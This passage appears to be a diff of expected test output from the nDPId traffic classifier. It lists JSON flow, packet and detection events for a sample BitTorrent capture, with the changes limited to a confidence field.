AAAHQF\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/+\/\/\/+\/\/7\/\/\/\/\/7\/\/\/\/\/\/\/\/\/\/\/\/\/\/v\/\/\/v\/\/v\/\/+P\/\/\/\/\/\/\/7\/\/\/\/\/\/\/\/+\/7\/7\/\/\/\/\/\/7\/\/\/\/\/\/v\/\/3+\/\/+\/\/\/\/\/\/\/\/\/\/\/\/\/9\/\/\/7\/\/\/+\/\/\/\/\/\/\/\/\/\/\/\/\/\/+\/\/\/\/\/\/\/\/\/\/3\/\/gAAAAAUEAAACNQAAAAUEAAACYwAAAAUEAAADgAAAAAUEAAAB1wAAAAUEAAAAyQAAAAUEAAABzQAAAAUEAAACUQAAAAUEAAABYQAAAAUEAAACzQAAAAUEAAAApQAAAAUEAAACtgAAAAUEAAACSAAAAAUEAAACDQAAAAUEAAABIQAAAAUEAAABYwAAAAUEAAAC5wAAAAUEAAAAlQAAAAUEAAABYgAAAAUEAAABlQAAAAUEAAADQQAAAAUEAAAB4wAAAAUEAAABOQAAAAUEAAABSwAAAAUEAAAAfQ=="} 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":113,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469980213,"flow_last_seen":1455469980213,"flow_idle_time":7580000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469980213,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"83.216.184.241","src_port":52927,"dst_port":51413,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00566{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":113,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":1455469980213,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":1455469980213,"pkt":"LFbcjDU0xCwDBkn+CABFAAB4U25AAEAGAADAqAEDU9i48c6\/yNUzq1kTBM6UFIAYL5vO3wAAAQEIChncIiN4G2eaE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVNMTg2MC1Bjq+Lj4Q+qUQM4PY="} -00727{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":113,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469980213,"flow_last_seen":1455469980213,"flow_idle_time":7580000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469980213,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"83.216.184.241","src_port":52927,"dst_port":51413,"l4_proto":"tcp","ndpi": {"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}} +00727{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":113,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469980213,"flow_last_seen":1455469980213,"flow_idle_time":7580000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469980213,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"83.216.184.241","src_port":52927,"dst_port":51413,"l4_proto":"tcp","ndpi": {"confidence": {"5":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":114,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469980262,"flow_last_seen":1455469980262,"flow_idle_time":7580000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469980262,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"93.65.249.100","src_port":52926,"dst_port":31336,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00567{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":114,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1455469980262,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":1455469980262,"pkt":"LFbcjDU0xCwDBkn+CABFAAB4esFAAEAGAADAqAEDXUH5ZM6+emiQl\/fDL3XicoAYTYMYvAAAAQEIChncIlIAH\/RSE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVNMTg2MC1BjkTA1ljAvA+q8j0="} -00858{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":114,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469980262,"flow_last_seen":1455469980262,"flow_idle_time":7580000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469980262,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"93.65.249.100","src_port":52926,"dst_port":31336,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}} +00858{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":114,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469980262,"flow_last_seen":1455469980262,"flow_idle_time":7580000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469980262,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"93.65.249.100","src_port":52926,"dst_port":31336,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"5":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":115,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469980275,"flow_last_seen":1455469980275,"flow_idle_time":7580000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469980275,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"93.65.227.100","src_port":52925,"dst_port":19116,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00565{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":115,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":1455469980275,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":1455469980275,"pkt":"LFbcjDU0xCwDBkn+CABFAAB4g5FAAEAGAADAqAEDXUHjZM69Sqzdpe7S802+OYAYVXMCvAAAAQEIChncIl4AhA2FE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVNMTg2MC1BjlkhEgSgYOOKqPw="} -00858{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":115,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469980275,"flow_last_seen":1455469980275,"flow_idle_time":7580000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469980275,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"93.65.227.100","src_port":52925,"dst_port":19116,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}} +00858{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":115,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469980275,"flow_last_seen":1455469980275,"flow_idle_time":7580000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469980275,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"93.65.227.100","src_port":52925,"dst_port":19116,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"5":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}} 00581{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":116,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":2,"flow_last_seen":1455469980297,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":146,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":146,"pkt_l4_len":112,"thread_ts_msec":1455469980297,"pkt":"xCwDBkn+LFbcjDU0CABFYACEPABAADIGPZ9T2LjxwKgBA8jVzr8EzpQUM6tZV4AYECksHwAAAQEICngbZ84Z3CIjE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVUMTg4Qi2qnlHDgsE5LNSCYRoAAAEAFABkMTplaTA="} 01382{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":119,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":3,"flow_last_seen":1455469980371,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":650,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":650,"pkt_l4_len":616,"thread_ts_msec":1455469980371,"pkt":"xCwDBkn+LFbcjDU0CABFYAJ8C7pAADIGa+1T2LjxwKgBA8jVzr8EzpRkM6tZV4AYECkszQAAAQEICngbaAwZ3CJzZTQ6aXB2NDQ6U9i48TQ6aXB2NjE2Ov6AAAAAAAAA6gaI\/\/7N9BMxMjpjb21wbGV0ZV9hZ29pMWUxOm1kMTE6dXBsb2FkX29ubHlpM2UxMTpsdF9kb250aGF2ZWk3ZTEyOnV0X2hvbGVwdW5jaGk0ZTExOnV0X21ldGFkYXRhaTJlNjp1dF9wZXhpMWUxMDp1dF9jb21tZW50aTZlZTEzOm1ldGFkYXRhX3NpemVpMTkwMDllMTpwaTUxNDEzZTQ6cmVxcWkyNTVlMTp2MTU6zrxUb3JyZW50IDEuOC44Mjp5cGk1MjkyN2U2OnlvdXJpcDQ6UjfNAWUAAAB0Bf\/\/\/v\/\/\/\/\/\/\/\/9\/f\/+\/\/9\/\/\/f\/\/\/\/\/\/\/73v\/\/\/\/\/\/\/\/\/\/f\/9\/\/\/\/\/\/\/\/\/\/\/\/\/9\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/3\/\/7\/\/3\/9v\/\/\/9+\/\/\/\/\/\/\/\/\/\/+\/\/\/\/\/\/\/\/\/\/\/3\/\/\/\/\/\/\/\/\/\/+\/\/\/\/7\/\/\/\/\/\/\/\/+\/\/\/\/\/\/\/\/\/\/\/4AAAAAFBAAAAiQAAAAFBAAAAQwAAAAFBAAAAisAAAAFBAAAArIAAAAFBAAAAFgAAAAFBAAAAxMAAAAFBAAAAgYAAAAFBAAAAfgAAAAFBAAAAvcAAAAFBAAAAm0AAAAFBAAAAMYAAAAFBAAAA0sAAAAFBAAAAXAAAAAFBAAAAMEAAAAFBAAAAecAAAAFBAAAABcAAAAFBAAAAI4AAAAFBAAAAHoAAAAFBAAAAgkAAAAFBAAAAMsAAAAFBAAAAGkAAAAFBAAAARwAAAAFBAAAAdQAAAAFBAAAAFA="} 00629{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":121,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":2,"flow_last_seen":1455469980390,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":182,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":182,"pkt_l4_len":148,"thread_ts_msec":1455469980390,"pkt":"xCwDBkn+LFbcjDU0CABFAACocqBAAHMGfF5dQflkwKgBA3pozr4vdeJykJf4B4AYAMOuCwAAAQEICgAf9F4Z3CJSE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVUMzQ1MC3wogL0Pl3FbMgdQMAAAAEAFABkMTplaTBlNDppcHY0NDpdQflkNDppcHY2MTY6IAEAAF71ef0Mhifaor4="} 01334{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":123,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":3,"flow_last_seen":1455469980488,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":614,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":614,"pkt_l4_len":580,"thread_ts_msec":1455469980488,"pkt":"xCwDBkn+LFbcjDU0CABFAAJYcqJAAHMGeqxdQflkwKgBA3pozr4vdeLmkJf4B4AZAMO1LAAAAQEICgAf9F8Z3CJSBpsxMjpjb21wbGV0ZV9hZ29pMmUxOm1kMTE6dXBsb2FkX29ubHlpM2UxMTpsdF9kb250aGF2ZWk3ZTEyOnV0X2hvbGVwdW5jaGk0ZTExOnV0X21ldGFkYXRhaTJlNjp1dF9wZXhpMWUxMDp1dF9jb21tZW50aTZlZTEzOm1ldGFkYXRhX3NpemVpMTkwMDllMTpwaTMxMzM2ZTQ6cmVxcWkyNTVlMTp2MTU6zrxUb3JyZW50IDMuNC41Mjp5cGk1MjkyNmU2OnlvdXJpcDQ6UjfNAWUAAAB0Bf\/\/\/\/\/\/\/\/\/\/\/99\/\/\/\/\/\/9\/\/+\/\/\/\/\/\/\/\/7\/\/3\/\/\/\/\/\/\/\/\/\/\/\/3\/\/\/\/\/\/\/\/\/7\/\/\/\/\/\/\/\/\/\/\/\/+\/\/\/\/\/v\/\/\/\/\/9\/\/\/\/\/\/3\/\/\/\/\/\/\/\/\/\/\/36\/\/\/\/\/93\/\/\/\/\/\/\/\/\/\/\/\/\/fv\/\/\/9P\/\/3\/\/\/\/\/f\/\/\/\/\/\/\/\/\/\/\/\/4AAAAAFBAAAAm0AAAAFBAAAApQAAAAFBAAAAI0AAAAFBAAAA0AAAAAFBAAAASAAAAAFBAAAAwgAAAAFBAAAAHoAAAAFBAAAAV0AAAAFBAAAAfQAAAAFBAAAAwsAAAAFBAAAAmsAAAAFBAAAAhwAAAAFBAAAAuYAAAAFBAAAAmQAAAAFBAAAApAAAAAFBAAAAFAAAAAFBAAAAc0AAAAFBAAAAa0AAAAFBAAAAx4AAAAFBAAAANIAAAAFBAAAAu0AAAAFBAAAAwoAAAAFBAAAAEoAAAAFBAAAAME="} -00830{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1455469967550,"flow_last_seen":1455469968002,"flow_idle_time":7580000,"flow_min_l4_payload_len":14,"flow_max_l4_payload_len":527,"flow_tot_l4_payload_len":871,"flow_avg_l4_payload_len":174,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"82.57.97.83","src_port":52887,"dst_port":53137,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}} -00831{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1455469974533,"flow_last_seen":1455469974889,"flow_idle_time":7580000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":520,"flow_tot_l4_payload_len":875,"flow_avg_l4_payload_len":175,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"82.57.97.83","src_port":52906,"dst_port":53137,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}} -00701{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1455469969259,"flow_last_seen":1455469973374,"flow_idle_time":7580000,"flow_min_l4_payload_len":7,"flow_max_l4_payload_len":582,"flow_tot_l4_payload_len":1030,"flow_avg_l4_payload_len":128,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"83.216.184.241","src_port":52895,"dst_port":51413,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}} -00704{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1455469980213,"flow_last_seen":1455469981133,"flow_idle_time":7580000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":584,"flow_tot_l4_payload_len":1048,"flow_avg_l4_payload_len":209,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"83.216.184.241","src_port":52927,"dst_port":51413,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}} -00833{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1455469978422,"flow_last_seen":1455469978679,"flow_idle_time":7580000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":520,"flow_tot_l4_payload_len":875,"flow_avg_l4_payload_len":175,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"95.237.193.34","src_port":52922,"dst_port":11321,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}} -00833{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1455469975240,"flow_last_seen":1455469975394,"flow_idle_time":7580000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":170,"flow_tot_l4_payload_len":348,"flow_avg_l4_payload_len":87,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"151.72.255.163","src_port":52912,"dst_port":59928,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}} -00832{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1455469970233,"flow_last_seen":1455469971153,"flow_idle_time":7580000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":527,"flow_tot_l4_payload_len":951,"flow_avg_l4_payload_len":190,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"151.26.95.30","src_port":52897,"dst_port":22673,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}} -00833{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1455469975234,"flow_last_seen":1455469976169,"flow_idle_time":7580000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":534,"flow_tot_l4_payload_len":883,"flow_avg_l4_payload_len":176,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"151.26.95.30","src_port":52911,"dst_port":22673,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}} -00833{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1455469978413,"flow_last_seen":1455469978679,"flow_idle_time":7580000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":521,"flow_tot_l4_payload_len":882,"flow_avg_l4_payload_len":176,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"95.234.159.16","src_port":52921,"dst_port":41205,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}} -00833{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1455469980262,"flow_last_seen":1455469980488,"flow_idle_time":7580000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":548,"flow_tot_l4_payload_len":732,"flow_avg_l4_payload_len":244,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"93.65.249.100","src_port":52926,"dst_port":31336,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}} -00831{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1455469980275,"flow_last_seen":1455469980275,"flow_idle_time":7580000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"93.65.227.100","src_port":52925,"dst_port":19116,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}} -00832{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1455469971675,"flow_last_seen":1455469973590,"flow_idle_time":7580000,"flow_min_l4_payload_len":14,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":350,"flow_avg_l4_payload_len":87,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"190.103.195.56","src_port":52902,"dst_port":46633,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}} -00835{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1455469976582,"flow_last_seen":1455469980118,"flow_idle_time":7580000,"flow_min_l4_payload_len":9,"flow_max_l4_payload_len":584,"flow_tot_l4_payload_len":1088,"flow_avg_l4_payload_len":155,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"190.103.195.56","src_port":52914,"dst_port":46633,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}} -00830{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1455469969441,"flow_last_seen":1455469969689,"flow_idle_time":7580000,"flow_min_l4_payload_len":14,"flow_max_l4_payload_len":554,"flow_tot_l4_payload_len":850,"flow_avg_l4_payload_len":170,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"79.53.228.2","src_port":52896,"dst_port":14627,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}} -00829{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1455469975265,"flow_last_seen":1455469975265,"flow_idle_time":7580000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"79.53.228.2","src_port":52909,"dst_port":14627,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}} 